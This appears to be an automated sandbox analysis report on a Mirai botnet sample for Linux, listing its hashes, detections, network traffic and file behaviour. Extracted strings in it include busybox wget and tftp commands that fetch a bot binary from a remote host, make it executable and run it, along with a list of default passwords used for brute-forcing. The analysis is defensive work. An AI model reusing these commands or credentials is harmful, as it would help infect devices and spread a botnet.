Linux Analysis Report
na.elf

Overview

General Information

Sample name: na.elf
Analysis ID: 1530605
MD5: c7ed33bceba3443fa3b08e8524e4f7e5
SHA1: 3e274c0691ebd032dd59b308e609f94a4a464dbd
SHA256: 7c0ad1d4c740aeebd75b9db0499ba23bbadd680e6f07672137c8348973a69076
Tags: elfMiraiuser-abuse_ch
Infos:

Detection

Mirai
Score: 72
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: na.elf Avira: detected
Source: na.elf ReversingLabs: Detection: 34%
Source: na.elf String: ash|login|wget|curl|tftp|ntpdate
Source: na.elf String: /proc//exe|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin/
Source: global traffic TCP traffic: 192.168.2.15:53606 -> 38.60.249.66:7193
Source: /tmp/na.elf (PID: 5521) Socket: 127.0.0.1:1234 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 55.4.250.0
Source: unknown TCP traffic detected without corresponding DNS query: 31.200.49.251
Source: unknown TCP traffic detected without corresponding DNS query: 194.227.252.195
Source: unknown TCP traffic detected without corresponding DNS query: 21.194.185.165
Source: unknown TCP traffic detected without corresponding DNS query: 124.72.189.23
Source: unknown TCP traffic detected without corresponding DNS query: 107.133.114.19
Source: unknown TCP traffic detected without corresponding DNS query: 63.59.19.135
Source: unknown TCP traffic detected without corresponding DNS query: 124.243.56.111
Source: unknown TCP traffic detected without corresponding DNS query: 155.118.25.34
Source: unknown TCP traffic detected without corresponding DNS query: 193.166.204.66
Source: unknown TCP traffic detected without corresponding DNS query: 252.185.98.41
Source: unknown TCP traffic detected without corresponding DNS query: 171.27.214.152
Source: unknown TCP traffic detected without corresponding DNS query: 84.40.244.48
Source: unknown TCP traffic detected without corresponding DNS query: 189.87.159.171
Source: unknown TCP traffic detected without corresponding DNS query: 61.166.94.91
Source: unknown TCP traffic detected without corresponding DNS query: 128.106.122.13
Source: unknown TCP traffic detected without corresponding DNS query: 200.68.69.172
Source: unknown TCP traffic detected without corresponding DNS query: 29.72.225.65
Source: unknown TCP traffic detected without corresponding DNS query: 100.145.135.35
Source: unknown TCP traffic detected without corresponding DNS query: 252.40.158.124
Source: unknown TCP traffic detected without corresponding DNS query: 25.47.82.2
Source: unknown TCP traffic detected without corresponding DNS query: 143.186.9.253
Source: unknown TCP traffic detected without corresponding DNS query: 83.88.247.239
Source: unknown TCP traffic detected without corresponding DNS query: 186.242.205.247
Source: unknown TCP traffic detected without corresponding DNS query: 61.156.59.191
Source: unknown TCP traffic detected without corresponding DNS query: 192.30.242.232
Source: unknown TCP traffic detected without corresponding DNS query: 109.62.245.8
Source: unknown TCP traffic detected without corresponding DNS query: 67.216.252.83
Source: unknown TCP traffic detected without corresponding DNS query: 14.61.23.31
Source: unknown TCP traffic detected without corresponding DNS query: 8.141.33.205
Source: unknown TCP traffic detected without corresponding DNS query: 98.41.17.52
Source: unknown TCP traffic detected without corresponding DNS query: 41.48.125.241
Source: unknown TCP traffic detected without corresponding DNS query: 15.197.182.98
Source: unknown TCP traffic detected without corresponding DNS query: 201.138.112.100
Source: unknown TCP traffic detected without corresponding DNS query: 160.130.50.24
Source: unknown TCP traffic detected without corresponding DNS query: 75.234.70.254
Source: unknown TCP traffic detected without corresponding DNS query: 143.62.173.176
Source: unknown TCP traffic detected without corresponding DNS query: 123.249.19.204
Source: unknown TCP traffic detected without corresponding DNS query: 47.241.90.227
Source: unknown TCP traffic detected without corresponding DNS query: 42.66.160.9
Source: unknown TCP traffic detected without corresponding DNS query: 113.58.44.10
Source: unknown TCP traffic detected without corresponding DNS query: 147.237.231.121
Source: unknown TCP traffic detected without corresponding DNS query: 122.122.133.15
Source: unknown TCP traffic detected without corresponding DNS query: 72.4.17.22
Source: unknown TCP traffic detected without corresponding DNS query: 115.150.202.132
Source: unknown TCP traffic detected without corresponding DNS query: 175.222.13.224
Source: unknown TCP traffic detected without corresponding DNS query: 195.78.106.188
Source: unknown TCP traffic detected without corresponding DNS query: 137.67.137.98
Source: unknown TCP traffic detected without corresponding DNS query: 113.200.126.77
Source: unknown TCP traffic detected without corresponding DNS query: 242.88.37.40
Source: global traffic DNS traffic detected: DNS query: eighteen.pirate
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: na.elf String found in binary or memory: http://%d.%d.%d.%d/la.bot.%s
Source: Initial sample String containing 'busybox' found: '8/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
Source: Initial sample String containing 'busybox' found: /bin/busybox BOT
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox BOT
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
Source: Initial sample String containing 'busybox' found: '8/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh
Source: Initial sample String containing 'busybox' found: /bin/busybox BOTbuf = %s
Source: Initial sample String containing 'busybox' found: >%st && cd %s && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: armx86_64mipsmipselsuperhpowerpcsparcget: applet not foundftp: applet not foundcho: applet not found>>>/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: retrieve/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: 12345678
Source: Initial sample String containing potential weak password found: 654321
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: administrator
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal72.troj.evad.linELF@0/0@3/0

Data Obfuscation

barindex
Source: /tmp/na.elf (PID: 5525) File: /etc/config Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /root/.cache Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /root/.ssh Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /root/.config Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /root/.local Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.X11-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.Test-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.font-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.ICE-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.XIM-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /etc/.java Jump to behavior
Source: /usr/bin/dash (PID: 5500) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.DqSTHg5SOE /tmp/tmp.FUxV3jxmUC /tmp/tmp.HwIRvgXqI4 Jump to behavior
Source: /usr/bin/dash (PID: 5502) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.DqSTHg5SOE /tmp/tmp.FUxV3jxmUC /tmp/tmp.HwIRvgXqI4 Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/na.elf (PID: 5525) Log files deleted: /var/log/kern.log Jump to behavior
Source: /tmp/na.elf (PID: 5521) Queries kernel information via 'uname': Jump to behavior
Source: na.elf, 5521.1.0000562ede6d1000.0000562ede781000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: na.elf, 5521.1.00007ffc7e0c4000.00007ffc7e0e5000.rw-.sdmp Binary or memory string: >x86_64/usr/bin/qemu-ppc/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
Source: na.elf, 5521.1.0000562ede6d1000.0000562ede781000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
Source: na.elf, 5521.1.00007ffc7e0c4000.00007ffc7e0e5000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc

Stealing of Sensitive Information

barindex
Source: Yara match File source: na.elf, type: SAMPLE

Remote Access Functionality

barindex
Source: Yara match File source: na.elf, type: SAMPLE
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs